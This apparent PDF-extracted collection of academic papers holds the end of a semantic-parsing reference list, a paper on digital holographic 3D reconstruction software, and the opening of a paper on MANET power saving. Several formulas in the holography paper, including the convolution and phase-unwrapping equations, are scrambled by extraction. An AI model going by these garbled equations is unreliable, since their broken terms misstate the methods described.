Honnibal, J.R. Curran, and J. Bos. 2010. Rebanking CCGbank for improved NP interpretation. In Proceed- ings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 207–215. Associa- tion for Computational Linguistics. E. Hovy, M. Marcus, M. Palmer, L. Ramshaw, and R. Weischedel. 2006. Ontonotes: the 90% solution. In Proceedings of the Human Language Technology Conference of the NAACL, Companion Volume: Short Papers, pages 57–60. Association for Computational Linguistics. P. Kingsbury and M. Palmer. 2002. From treebank to propbank. In Proceedings of the 3rd International Conference on Language Resources and Evaluation (LREC-2002), pages 1989–1993. Citeseer. K. Kipper, H.T. Dang, and M. Palmer. 2000. Class-based construction of a verb lexicon. In Proceedings of the National Conference on Artificial Intelligence, pages 691–696. Menlo Park, CA; Cambridge, MA; London; AAAI Press; MIT Press; 1999. Jayant Krishnamurthy and Tom M. Mitchell. 2012. Weakly supervised training of semantic parsers. In Proceedings of the 2012 Joint Conference on Empir- ical Methods in Natural Language Processing and Computational Natural Language Learning, EMNLP- CoNLL ’12, pages 754–765. Association for Compu- tational Linguistics. P. Liang, M.I. Jordan, and D. Klein. 2011. Learning dependency-based compositional semantics. In Proc. Association for Computational Linguistics (ACL). Dekang Lin and Patrick Pantel. 2001. DIRT - Discovery of Inference Rules from Text. In In Proceedings of the ACM SIGKDD Conference on Knowledge Discovery and Data Mining, pages 323–328. Bill MacCartney and Christopher D. Manning. 2007. Natural logic for textual inference. In Proceedings of the ACL-PASCAL Workshop on Textual Entailment and Paraphrasing, RTE ’07, pages 193–200. Associa- tion for Computational Linguistics. Andrew Kachites McCallum. 2002. Mal- let: A machine learning for language toolkit. http://mallet.cs.umass.edu. W. McCune. 2005. Prover9 and Mace4. http://cs.unm.edu/˜mccune/mace4/. G.A. Miller. 1995. Wordnet: a lexical database for en- glish. Communications of the ACM, 38(11):39–41. M. Mintz, S. Bills, R. Snow, and D. Jurafsky. 2009. Dis- tant supervision for relation extraction without labeled data. In Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th Interna- tional Joint Conference on Natural Language Process- ing of the AFNLP: Volume 2-Volume 2, pages 1003– 1011. Association for Computational Linguistics. J. Mitchell and M. Lapata. 2008. Vector-based models of semantic composition. proceedings of ACL-08: HLT, pages 236–244. R.M. Neal. 2000. Markov chain sampling methods for dirichlet process mixture models. Journal of compu- tational and graphical statistics, 9(2):249–265. D.O. O’Seaghdha. 2010. Latent variable models of se- lectional preference. In Proceedings of the 48th An- nual Meeting of the Association for Computational Linguistics, pages 435–444. Association for Compu- tational Linguistics. Hoifung Poon and Pedro Domingos. 2009. Unsuper- vised semantic parsing. In Proceedings of the 2009 Conference on Empirical Methods in Natural Lan- guage Processing: Volume 1 - Volume 1, EMNLP ’09, pages 1–10. Association for Computational Linguis- tics. Hoifung Poon and Pedro Domingos. 2010. Unsuper- vised ontology induction from text. In Proceedings of the 48th Annual Meeting of the Association for Com- putational Linguistics, ACL ’10, pages 296–305. As- sociation for Computational Linguistics. A. Ritter, O. Etzioni, et al. 2010. A latent dirichlet allo- cation method for selectional preferences. In Proceed- ings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 424–434. Associa- tion for Computational Linguistics. Stefan Schoenmackers, Oren Etzioni, Daniel S. Weld, and Jesse Davis. 2010. Learning first-order horn clauses from web text. In Proceedings of the 2010 Conference on Empirical Methods in Natural Lan- guage Processing, EMNLP ’10, pages 1088–1098. Association for Computational Linguistics. R. Socher, B. Huval, C.D. Manning, and A.Y. Ng. 2012. Semantic compositionality through recursive matrix- vector spaces. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natural Lan- guage Processing and Computational Natural Lan- guage Learning, pages 1201–1211. Association for Computational Linguistics. 190 Mark Steedman. 2000. The Syntactic Process. MIT Press. Mark Steedman. 2012. Taking Scope: The Natural Se- mantics of Quantifiers. MIT Press. Idan Szpektor, Eyal Shnarch, and Ido Dagan. 2007. Instance-based evaluation of entailment rule acquisi- tion. In In Proceedings of ACL 2007, volume 45, page 456. Ivan Titov and Alexandre Klementiev. 2011. A bayesian model for unsupervised semantic parsing. In Proceed- ings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Tech- nologies, pages 1445–1455, Portland, Oregon, USA, June. Association for Computational Linguistics. Limin Yao, Aria Haghighi, Sebastian Riedel, and Andrew McCallum. 2011. Structured relation discovery using generative models. In Proceedings of the Conference on Empirical Methods in Natural Language Process- ing, EMNLP ’11, pages 1456–1466. Association for Computational Linguistics. Limin Yao, Sebastian Riedel, and Andrew McCallum. 2012. Unsupervised relation discovery with sense dis- ambiguation. In ACL (1), pages 712–720. J.M. Zelle and R.J. Mooney. 1996. Learning to parse database queries using inductive logic programming. In Proceedings of the National Conference on Artifi- cial Intelligence, pages 1050–1055. 191 192 work_vwxawihnvjb6xjwllmb2tut3m4 ---- 正文模板 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 62 Research on Digital Holographic 3D Reconstruction Software Ma Jing School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, Shaanxi, China e-mail: majing_majing@qq.com Fu Yanfang, Tian Penghui School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, Shaanxi, China Abstract—Digital holography has a wide range of applications in displaying the surface morphology of three-dimensional objects. There have been many studies on the physical methods and implementation methods of digital holography. One of the main problems at present is to design a stable and fast reconfiguration software. This paper analyzes the basic principle of convolution based off-axis digital holographic reconstruction, and presents the process of 3D reconstruction of off-axis digital holography. The 3D reconstruction software of digital holography is designed and developed according to the basic principle and the process of reconstruction, and the parallel operation of 3D reconstruction is realized by OpenMP. Results show that the software can help researchers conveniently realize digital holographic three-dimensional reconstruction. The reconstructed parameters can be adjusted according to the requirements, and the spectra, intensity maps, phase maps and other information required in the reconstruction process can be obtained. The software meets the needs of digital three-dimensional reconstruction. Keywords-Digital Holography; Three-dimensional Reconstruction; Parallel Computing; Software Design I. INTRODUCTION Digital holography has wide application prospects in the field of three-dimensional surface deformation measurement [1], particle field test [2], flow field measurement [3], biological sample microscopic measurement [4-5]. At present, a lot of research on the algorithms and applications of digital holography has been carried out. In the early stage, the single Fourier transform algorithm is widely used, and this algorithm can reproduce the pixel size and the reproduction distance. Now based on the Fast Fourier Transform convolution, angular and Fresnel methods for phase unwrap and numerical compensation for a lot of improvements [6-7]. In order to carry out the required reconstruction in the research of digital holography conveniently and quickly, in this paper, based on the reconstruction principle used in 3D reconstruction of digital holography, a digital holographic 3D reconstruction software is designed and developed according to the reconstruction process. II. RECONSTRUCTION PRINCIPLE The principle of digital holography is the same as that of traditional optical holography. It is divided into the recording and reproducing process of matter and light wave, which are realized by the interference principle and diffraction principle of light. Digital holographic reconstruction is to process the digital hologram to obtain the object information. For off-axis holography, we need to record the object information in the form of interference fringes by off-axis physical optical path, and use the interference principle to record the object information in the form of an image through a CCD camera to form a hologram. According to different measurement objects and recording conditions, digital holographic methods mainly include convolutional reconstruction algorithm and Fresnel diffraction integral reconstruction algorithm. The software uses a convolution method. According to convolution theory, the complex amplitude of the object light,  ,U x y can be expressed in the following formula according to the intensity of interference fringes, the intensity of reference light and the impulse response function.     1, { [ ( , )( , )] [ ( , , , )]}u x y F F H x y C x y F h x y In the formula,  ,H x y is a hologram,  ,C x y is a reference light,   , , ,h x y is a impulse response function, which is related to a specific physical optical path. The calculation method is as follows：                        2 2 2 0 2 2 2 0 exp( ( ) ( ) , , , ( ) ( ) ( , ) jk z x y h x y j z x y h x y In the formula, λ is wavelength. The block diagram of the algorithm is shown in Figure 1. H（x，y） C（x，y） X Fourier transform F(h(x，y)) X Fourier inverse transform u（x，y） Figure 1. Block diagram of convolution The complex amplitude of the object light can be obtained by the above method. The complex amplitude of the object light carries the three-dimensional information of the object. If the object fluctuates beyond the wavelength range, it needs to be unwrapped to extract the three- dimensional distribution information of the object. In the process of digital holographic reconstruction, there are usually three ways:(1) Fresnel transform diffraction 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 63 method (2) Fourier transform filter method (3) Fresnel wavelet transform method. The software uses the method (2). Fourier transform filter method directly to digital hologram Fourier transform, and then in the Fourier domain using filtering, frequency shift and other methods to remove the zero-order spectrum and the spectrum of conjugation, and then inverse Fourier transform. Phase unwrapping is to achieve an important part of 3D reconstruction of digital holography. The minimum norm method is a kind of algorithms which are widely used at present, of which there are four typical algorithms. (1) Least square method based on fast Fourier transform (2) Least square method based on discrete cosine transform (3) Least square method based on transverse shear interference (4) Preconditioned conjugate gradient method. The software uses the method (1) to unwrap the phase diagram. The least square method based on Fast Fourier Transform The basic steps are as follows: (1) The package phase  ,i j even periodic extension, get y  ,i j ； (2) calculated               , , 1, , , 1 ( ) ( ) x x y y i j i j i j i j i j ， among them       , 1, , x i j i j i j ，       , , 1 , y i j i j i j ； (3) Perform a two-dimensional FFT on  ,i j to get , ˆ i j P ； (4) Find     , , ˆ ˆ /[2cos( / ) 2cos( / ) 4] i j i j F P i M j N (5) Perform the two-dimensional IFFT transform on , ˆ i j F to obtain the true phase value  , ˆ i j after the period extension, take    , , ˆ 4 i j i j III. SOFTWARE DESIGN A. Refactoring Process Digital holographic reconstruction software reconstruction process shown in Figure 2. The object of digital holographic processing is the hologram collected by reconstructing the hardware system. According to the different components of the reconstructed hardware system, the first need to multiply the hologram with the reference light. For the case of reference light for plane light, this step can be omitted. After getting the spectrum, You will find the spectral distribution of the information contained in the spectrum near the center of the positive and negative level, the strongest in the image center of the zero-level there is no object information. Therefore, the need for frequency selection and frequency shift. Frequency selection is to choose a positive or negative level of the spectrum area. The frequency shift is to move the positive first-order or negative-order spectrum center to the image center. According to the need to reconstruct the hologram, frequency spectrum processing for frequency shift. Besides shifting the frequency spectrum to the center of the circle, we can see clearly that there is another advantage besides the image frequency distribution. It can separate the periodic interference signals. After the frequency-shifted image is obtained, the transfer function is multiplied with the frequency shifted image, and the product of the two is inverse Fourier transformed. The inverse transform image is a complex image. The phase contains the information of the object. In this case, the phase 0-2pi needs to be unwrapped. Holog ram Reference light X Fourier transform Spectrum diag ram Frequency shift Frequency shift after frequency shift Transfer function diag ram Inverse Fourier transform X Plural function diag ram Unwrapping Phase diag ram Unwrap the phase diag ram Object elevation data Linear transformation Figure 2. Digital holographic 3d reconstruction process After unwrapping the phase represents the actual object elevation, the phase information of the object can be obtained according to the calibration value. The reconstruction algorithm of the three dimensional digital holography is a complicated and time-consuming process. In addition, in the process of reconstruction, the user is generally required to select the appropriate spectrum area and set the reconfiguration parameters such as the reconfiguration distance and wavelength. Therefore, in the design of software, multi-threaded design ideas. Work interface using interface thread, reconstruction algorithm for worker threads. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 64 B. Parallel processing algorithm In the process of 3D reconstruction of digital holography, a lot of image processing is needed. Parallel processing algorithm is needed to improve the speed of operation, so as to improve the real-time performance of 3D reconstruction of digital holography. This paper uses OpenMP technology to realize parallel operation. OpenMP is led by the OpenMP Architecture Review Board and is widely accepted. t is a set of guiding compilation and processing scheme (Compiler Directive) for multi thread programming for shared memory parallel system. Because the reconstruction process of digital holography for every image needs sequential execution, it can not parallel operation of different stages of reconstruction process. The task of each process can only be processed in parallel. From the processing flow, it can be seen that the sub tasks are basically the processing of the complex number or the real image. Therefore, this paper uses the parallel processing method for the loop operation, and only needs to add the following OpenMP compilation instructions before the for statement which needs parallel operation: #pragma omp parallel for schedule(kind,[size]) Among them kind represents a pattern, and there are three patterns in all ， They are static 、 dynamic and guided。The static mode for each thread to allocate size cycle tasks, according to the number of threads to complete the task allotment. If the size value is too large, it may cause some heavy kernel tasks, and some kernels do not have the task. In dynamic mode, the size cycle task is also assigned to each kernel on the surface, but the allocation process is dynamic. Which kernel is idle to give it a size distribution cycle tasks. In guided mode, each kernel is assigned tasks in descending order, allocating more tasks first, and then gradually reducing the tasks, the minimum task size cycle. If no size is specified in all the above modes, the default value is 1. In order to detect the running speed of parallel algorithm and all kinds of parallel operation modes, the running time of software is tested on desktop equipped with AMD Phenom II X6 1055T six core processor. The resolution of the hologram is 1024x768. The 400 reconstruction of holograms is done during the test, and the mean and variance of the reconstructed time are calculated, as shown in Table 1. TABLE I. RECONFIGURATION TIME FOR DIFFERENT PARALLEL MODES Parallel mode Times Variance None 0.369 0.0075 Static,2 0.236 0.0080 Dynamic,2 0.233 0.0055 Guided,2 0.233 0.0051 Static,8 0.242 0.0160 Dynamic,8 0.236 0.0075 Guided,8 0.238 0.0057 From the above test results, we can see that when the parallel processing algorithm is not adopted, the average time of each reconstruction is 0.369s, which is about 1.56 times parallel algorithm. For different parallel algorithm patterns, the average reconfiguration time is almost the same and the variance has small difference. IV. PROCESSING RESULTS Based on the above reconstruction algorithm, the 3D reconstruction software of digital holography is developed by using C++ language. In order to verify the effect of the software, a part of the hologram is reconstructed. As shown in Figure 3, the main parameters of the microlens array hologram are as follows: wavelength(532nm), Pixel size(4.65um), Sample refractive index(1.461), Reconstruction distance(0mm) Figure 3. Microlens array hologram The reconfiguration of the hologram is based on the above reconfiguration parameters, and the result of the reconfiguration is shown in Figure 4. Figure 4. Reconstructed image of microlens array Figure 5 shows a hologram of a cross object with a wavelength of 632.8nm, a pixel size of 4.65um, and a reconfiguration distance of 105.9mm. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 65 Figure 5. Cross structure hologram The reconstructed 3D image is shown in Figure 6. Figure 6. Cross structure reconstructed image The 3D reconstruction software of digital holography can not only display the 3D reconstruction map, but also display the original phase map, frequency spectrum, intensity map, phase map and 3D reconstruction map according to the requirements. Users can set reconfiguration parameters according to needs, select positive and negative primary centers and reconstructed areas in the center of spectrum, and reconstruct results and process data can be saved in images or data. The software interface is shown in Figure 7. Figure 7. Software interface V. CONCLUSION This paper analyzes the basic principle of the reconstruction of off-axis digital holography based on convolution. According to this principle, the 3D reconstruction process of off-axis digital holography is given, and the 3D reconstruction software of digital holography is designed and developed. In order to improve the running speed of 3D reconstruction, the parallel operation of 3D reconstruction is realized by using OpenMP Technology. The various implementations of OpenMP parallel computing methods were analyzed comparatively. The results show that the average time is basically the same as the reconstruction of various parallel mode, but the variance of guided model is relatively smaller. Finally, the partial hologram is reconstructed by using this software. The result shows that the software can fulfill the requirement of 3D reconstruction of digital holography, and has good practicability. It solves the functional integration needed in digital holography reconstruction, and facilitates the process of digital holography. ACKNOWLEDGMENTS The work described in this paper was fully supported by Special scientific research project of Shaanxi Provincial Education Department(16JK1379), and Shaanxi Province New Network and Testing and Control Engineering Laboratory project. And State and Provincial Joint Engineering Laboratory of Advanced Network and Monitoring Conrrol(ANMC) fund project(GSYSJ2017011). REFERENCE [1] Kim Myung K, Parshall Daniel Phase imaging digital holography for biological microscopy. Proc of SPIE,2004,5324:94~101 [2] C. B. Lefebvre, S. Coëtmellec, D. Lebrun, et al. Application of wavelet transform to hologram analysis: three dimensional location of particles[J]. Opt. Laser Eng., 2000, 33(6): 409-421 [3] J. Desse, P. Picart, P. Tankam. Digital three-color holographic interferometry for flow analysis[J]. Opt. Express, 2008, 16(5): 5471- 5480. [4] M.K. Kim. Application of digital holography in biomedical microscopy. J.Opt. Soc.Korea, 2010, 14(2):77-89. [5] U. Schnar and W. Juptner, Digital recording and numereical reconstruction of holograms, Meas. Sci. Technol, 2002,13:R85-R101. [6] Zhang yi Zhuo, Wang da Yong, Zhao jie, Wan yu Hong, Jiang zhu Qing, Tao shi Quan. Research on practical phase unwrapping algorithm in digital holography [J]. Journal of Optics.2009.29(12)： 3323-3327. [7] Zhang zhi Hui, Wang hua Ying, Liu zuo Qiang, HuangMin, Liu fei Fei, Yu Meng Jie, Zhao bao Qun. Phase Unwrapping Algrithms Based on Fast Four Transform. Laser & Optoeelectronics Progress, 2012, 120902(49):120902-1~7. work_vxcfrpl4rfdr7nmmpo4brledfm ---- Submitted 7 June 2019 Accepted 24 September 2019 Published 18 November 2019 Corresponding authors Lubna Naaz Fatima, lubnanaaz5@gmail.com Fahmina Taranum, ftaranum@yahoo.com, ftaranum@mjcollege.ac.in Academic editor Daniele D’Agostino Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.228 Copyright 2019 Fatima et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Efficient strategies to reduce power consumption in MANETs Lubna Naaz Fatima*, Syeda Hajra Mahin and Fahmina Taranum* Computer Science and Engineering, Muffakham Jah College of Engineering and Technology, Hyderabad, Telangana, India * These authors contributed equally to this work. ABSTRACT In current circumstances, where amelioration in technology is elevating, power optimization is of grave concern, whilst perceiving portable conditions. The focus is to design an efficient system with an aim to reduce power consumption and improve performance of other metrics. Heterogeneous wireless systems will command in the next-generation wireless networks with the aggregation of different remote access mechanisms. A node in MANET (Mobile Adhoc NETworks) while consuming significant amount of energy practices data transmission and data retrieval process whilst bonding with other neighboring nodes that are within its range. The proposed work implements User Specified energy model and DYMO (DYnamic Manet On- demand) routing protocol. Further, additional features of IEEE 802.11 i.e., Power Saving Mode is employed. To obtain enhanced coverage at targeted areas, multi-hop relay strategy is taken into account, also to achieve a less power consuming network with a greater service life. Consequently, the efficiency of the devices is monitored by opting Residual Life Accurate battery model, by using different datasets of Duracell AA and AAA batteries. Simultaneously, battery model, energy model and DYMO (DYnamic Manet On-demand) are applied for IEEE 802.16 to get a comparative assessment of power consumption between IEEE 802.11 and IEEE 802.16. Results are generated for both the architectures i.e., 802.11 and 802.16 for metrics such as residual amount of energy for varying simulation time for all the nodes and for energy consumption in AODV (Ad Hoc On-Demand Distance Vector) and DYMO (DYnamic Manet On- demand) routing protocol using Qualnet version 7.4. Subjects Computer Networks and Communications, Mobile and Ubiquitous Computing Keywords DYMO, AODV, IEEE 802.11, IEEE 802.16, DCF, PS, DTIM INTRODUCTION Networking is a realm with brisk improvement in diverged categories, in which a category that requires immense importance is constrained battery life, which is a grave concern for the users and researchers. Constraining the utilization of battery, in union with enhancing its system execution and features in the battery exploitation, while upgrading the system execution and enhancing the features in the Mobile Station (MS), is a considerable challenge. Since a wireless device functioning is based on battery, the issues regarding conservation of energy has to be considered and the constrained battery charge will force the node to route just a limited number of bits. The maximum numbers of bits that can How to cite this article Fatima LN, Mahin SH, Taranum F. 2019. Efficient strategies to reduce power consumption in MANETs. PeerJ Comput. Sci. 5:e228 http://doi.org/10.7717/peerj-cs.228 https://peerj.com/computer-science mailto:lubnanaaz5@gmail.com mailto:ftaranum@yahoo.com mailto:ftaranum@mjcollege.ac.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.228 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.228 be delivered are considered by dividing the total energy with energy utilized per bit. Hence power conserving techniques that alleviate the battery life is needed. Major issues with ad-hoc mode is the constrained battery and restricted data transmission bandwidth. Thereupon, the considerate part of the ad-hoc systems has the algorithm centric implementation along with deduction for energy depleted per bit during transmission based on transmission strategies to deduce overhead control and alleviate the performance of bandwidth consumption. DYMO routing protocol The Dynamic MANET on Demand (DYMO) routing protocol inherits some of the characteristics of Ad hoc on-Demand Distance Vector (AODV) routing protocol. Captivating and unveiling a significant number of its benefits, it is simpler to execute and is outlined bearing future advancements in mind. DYMO functions as a reactive routing protocol, i.e., paths to the destination can be retrieved specifically when demanded. DYMO performs two main operations: (1) Route Discovery and (2) Route Maintenance. Route discovery is done with help of RREQ (route request) and RREP (route reply) messages whereas route maintenance is done using RERR (route error) message (DidaWiki, 2011). The Route Request (RREQ) messages are aired by the source node (Anuj, Sadawarti & Anil, 2013). Each RREQ maintains a report that captures the data of the nodes which it has gone through. The report hold details about every node and the process the nodes follow while it receives an RREQ message, and an instant evaluation is computed to route back to the original point of message. At the moment where an RREQ message catches up with its goal node, a Route Reply (RREP) (Anuj, Sadawarti & Anil, 2013) message will be delivered back to the starting point, which gives a confirmation that a route to the goal node was found. On its way back to the source, an RREP message can conveniently trace back the path on which the RREQ message was forwarded along with nodes it went through, to record two-sided path information, back to where it was originated from. The benefits of DYMO (Dynamic MANET On Demand) over AODV (Ad hoc On- Demand Distance Vector) are • If intermediate node has already an entry for destination in its routing table, it replies with route reply (RREP) message to source in response to route request (RREQ) message • Life time of a route is extended upon successful forwarding of a packet via that route. • When a route to a destination is lost then a Route Error (RERR) message is sent towards the source node and also RERR is multi casted to other nodes that were associated to unreachable node. Upon receiving message, the source node deletes the route from its routing table. If the source node has another packet to forward for the same destination node, it will again initiate a route discovery process. • The routing table of DYMO is comparatively less memory consuming than AODV • The overhead for the protocol decreases with increased network sizes and high mobility, and energy efficiency increases. Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 2/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228 IEEE 802.16 IEEE 802.16 was envisaged for a broad-range high-transmission remote access, also known as Wireless Metropolitan Area Network (Wireless MAN) or Worldwide Interoperability for Microwave Access (WiMAX). The data transmission rate can reach up to 70 Mbps and signal spectrum can go as much as 50-kilometres (31 miles) (Thontadharya et al., 2013). IEEE 802.16e provides mobility support to IEEE 802.16. IEEE 802.11 It is commercially known as the Wireless local area network (WLAN). Typically, two distinct structures, BSS (Basic Service Set or Infrastructure mode) and IBSS (Independent Basic Service Set) or Ad-hoc mode has been characterized by IEEE 802.11. In a BSS, mobile stations (STAs) are connected to an AP (Access Point) which is accountable for administering all the interactions that take place among the stations. Stations then reach to one and another in a straightforward fashion. In IEEE 802.11, the Power Saving Mode (PSM) is stationed on deducing the power utilization of the mobile device to point that lacks activity. Qualnet, IEEE 802.11 MAC features two diverse access components (Moustafa, Vasan & Raymond, 2002), the obligatory DCF (Distributed Co-ordination Function), and the optional PCF (Point Co-ordination Function). Distributed Coordination Function (DCF) Distributed Coordination Function (DCF) provides distributed channel access hinging on CSMA/CA (Carrier Sense Multiple Access with Collision avoidance) (Moustafa, Vasan & Raymond, 2002; COMLAB, 2017). In DCF, a station observes the channel’s state for a DIFS (DCF Inter frame Space) period prior to accessing the wireless medium, in order to forward the data. In a rare event the wireless medium is discovered busy amid the DIFS interim, the station will then delay its transmission. In the network where various stations struggle to achieve the remote medium, if numerous stations sense the channel to be occupied, they delay their progress. And when it is discovered that the channel is released then an attempt to capture the channel is made by the stations in urge to perform the data forwarding operation, which leads to collision. To prevent such effects DCF additionally specifies random back-off time, which forces a station to delay its attempt to access the wireless medium for an additional period. If the medium for DIFS length is found to be idle, then an authorized access to the medium can be gained and the transmission will commence for the data. DIFS span can be determined by the following equation, DCF Inter-frame Space (DIFS) = Short Inter-frame Space (SIFS)+ (2 * Slot time) Short Inter-frame Space (SIFS) is the measure of time in microseconds required for a remote interface to process a received frame and to react with a response frame (Tripathy, 2011; Moustafa, Vasan & Raymond, 2002; COMLAB, 2017). Network allocation vector IEEE 802.11 provides Network Allocation Vector (NAV) (COMLAB, 2017) that is utilized inside DCF/PCF which is intended to supervise the access to wireless medium by the stations, so that contention generated by the stations can be prevented. Each station in the Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 3/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228 system holds a NAV indicator, which notifies the station about the status of the wireless medium. If NAV is set as bit ’0’, the transmission won’t be initiated by the station, despite the fact that the medium is relieved from traffic. Power Saving Mode The IEEE 802.11 standard adopted the Power Save Mode (PSM) (Chen, Xie & Wang, 2011) / PS mode to reduce energy utilization at stations (STA’s). As indicated by the IEEE 802.11 standard during the PS mode, a node remains in either of the two states, i.e., in active state, or sleep state. In the active state, the node performs information exchange. In the sleep state, on the differentiation, the station is turned off and thus, it cannot detect the network operations. The remote interface is in alert state for most of the listening period, and power utilization in this state is a bit excess when compared to the rest state. In rest mode, the access point (AP) stocks up the approaching frames, destined for a particular mobile station in PSM and intermittently declares its buffering status through the Traffic Indication Map (TIM) (Tripathy, 2011) which is encapsulated in the beacon frames and this information is forwarded to all the nodes in PSM by means of a unicast, broadcast, or a multicast. Beacon frame (Chen, Xie & Wang, 2011), a management frame in IEEE 802.11, is aired out by the controller, which carries thorough information about the network. They are transmitted intermittently by the access point and serve to synchronize the transmission of the data among the nodes. The mobile station in PSM will awake periodically to listen to the beacon frames. When the in partial virtual bitmap field of TIM matches to its Association ID (AID), the mobile station sends a PS-Poll frame (COMLAB, 2017) to the AP to fetch the data and the AP acknowledges to each poll with a buffered frame. Numerous exchanges of PS-Polls occur between mobile stations and AP, until every single frame has been redeemed by the mobile station. In the broadcast or multicast case, the presence of buffered frames at access point is revealed by setting bit map control and partial virtual bitmap field in the TIM (Traffic Indication Map), DTIM (Delivery Traffic Indication Map) is a unique TIM conveyed at a fixed number of beacon interims (Tripathy, 2011). The access point wakes up the mobile stations for it to collect the data cached for it. The less the value of DTIM period is, the more consistently a node wakes up and the more battery it utilizes. By parameterizing, a low DTIM and beacon interval help the nodes to be conscious and serve for a longer period of time. Rather than the ordinary Continuous Active Mode (CAM), a remote station in PSM can frequently put off its system interface to preserve energy when it has no further data buffered at the AP. Figure 1 demonstrates the overall mechanism of Power Saving Mode and also gives a review on how DTIM work in intervals. Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 4/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228 Figure 1 Power Saving Mode. The overall mechanism of Power Saving Mode considering two mobile stations and an access point. Full-size DOI: 10.7717/peerjcs.228/fig-1 Energy model A radio energy model evaluates the energy consumed in the hardware, specifically during the state that has been exhibited by the devices which can be transmit, receive, idle, and sleep mode. Qualnet supports four kinds of radio energy models, • Generic • Mica-Motes • Mica Z, and • User Defined Energy Consumption of the Nodes The energy model presented by the Qualnet simulator gives the measure of energy absorbed by the nodes in different modes. A node in a network exhibit mostly four states, a) Transmit mode: The device dispatches the data to the destination or intermittent node b) Receive mode: The node retrieves the data from the source node or intermittent node c) Idle mode: There is no active session for the node when present in an idle state but the node tends to continuously hear the signals within its range from its neighboring nodes, in the event that neighboring nodes have data for the intended node, so as to establish a connection d) Sleep mode: Sleep mode enables the station to rest itself down for a while. However, in sleep mode, the MS stays associated with the base station. In this way, in Sleep mode, the BS holds all the data that is associated with the node in the sleep mode, as it does amid connected mode. Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 5/23 https://peerj.com https://doi.org/10.7717/peerjcs.228/fig-1 http://dx.doi.org/10.7717/peerj-cs.228 Formulae’s used to calculate the energy consumed in particular mode ETrans (Energy consumed in Transmit mode) = (Transmitting current *volt) * time ERecv (Energy consumed in Receive mode) = (Receiving current *volt) * time EIdle (Energy consumed in Idle mode) = (Idle current *volt) * time ESleep (Energy consumed in Sleep mode) = (Sleep current *volt) * time Formulae’s used to calculate the total energy consumption for a particular station Power consumption at Base station = ETrans+ERecv+EIdle+ESleep Power consumption at Relay station = ETrans+ERecv+EIdle+ESleep Power consumption at Mobile station = ETrans+ERecv+EIdle+ESleep Battery model The battery is basically a storehouse of electrical charge which gets refilled on recharging and empties itself when being absorbed. Along these lines, the functioning of the peripherals, for example, CPU, DC-DC converter, sensors, memory blocks, and so forth, appended to the battery are constrained due to limited battery charge. A DC-DC converter goes about as a voltage controller for different parts. With the assistance of battery models provided by the Qualnet, the system productivity and the functioning of the nodes can be contemplated under various circumstances. Different battery models include (Thontadharya et al., 2013) electro-chemical models, electrical-circuit models, analytical models, kinetic battery models, and stochastic models. Each one of them has certain points of interest and flaws. In analytical models, Peukert’s law is employed to evaluate the battery lifetime. In addition to Peukert’s law, analytical model makes use of Fick’s law and Faraday’s law to enhance the estimation of a battery lifetime that focused around one-dimensional diffusion. Thus, energy utilization of wireless devices plays a major role and can be fused with the battery models offered by Qualnet simulator. Some of the battery models supported by Qualnet Simulator are: • Precise Service Life Estimator—An exact evaluation of the span of a remote device that utilizes battery under predefined circumstances is estimated through the use of Precise Service Life Estimator battery model utilizing Rakhmatov’s analytical model. Batteries, for example, Duracell, AA, AAA, and Itsy are employed for this battery model. • Precise Residual Life Estimator—Precise Residual Life Estimator model measures the battery’s residual charge while circuit absorbs charge from the battery. One of the primary highlights of the battery is that, when the battery disperses the energy to the peripherals, a bit of charge is wasted. • Linear Model—Linear Model utilizes the coulomb counting method, which calculates the absorbed coulombs and by comparing the disseminated coulombs and a pre-recorded battery capacity gives the service life of the battery. Related work Shrimoy Tripathy scrutinized the performance of IEEE 802.11 Power Saving Mode (Tripathy, 2011) and acknowledged that certain incapabilities are observed such as, a beacon frame or a traded ATIM frames, they stay in dynamic mode, irrespective of whether there are any frames to be forwarded to the destination node. This increases the power utilization Fatima et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.228 6/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.228 of the system. Bearing in mind to scale down the power consumption ‘Probabilistic energy efficient routing’ convention (PEER) was designed by Mansi Rajgor, Prasanna Shete, R. N. Awale. While dealing with route handling in this routing protocol, the node checks its own residual battery charge, in view of which, it advances the packets with some probability associated to it. This probability depends on the level of the remaining of the battery level of the node. In this way, a route is discovered by nodes with high energy and thus an attempt is made to save the power and shield the system from early exhaustion. Later, when an increase in mobility of nodes caused high power reduction in nodes then Nand, Astya & Ali (2016) concentrated on mobility models that depict the action of the portable device. Furthermore, the location, speed, and acceleration that change after some time, were observed. Mobility models can be of numerous sorts, some of which are file based mobility model, group based mobility model, pedestrian mobility model, and random waypoint mobility model. Kandari & Pandey (2015) evaluated the energy consumption of AODV, DSR, and DYMO routing protocol by employing MICAZ Energy Model. At the end of evaluation, the outcomes were analyzed, and the examination report demonstrated that the energy consumed out of idle mode is high when compared to transmit and receive mode. Likewise, it has been noticed that DYMO gives the highest throughput, which is then joined by DSR and AODV. Simultaneously, an Energy Efficient Routing Protocol (EERP) was proposed by Bhatt, Jain & Upadhyay (2013). Amid the course route discovery and reply process, the distance isolating two successive nodes is registered depending on RSS (Received Signal 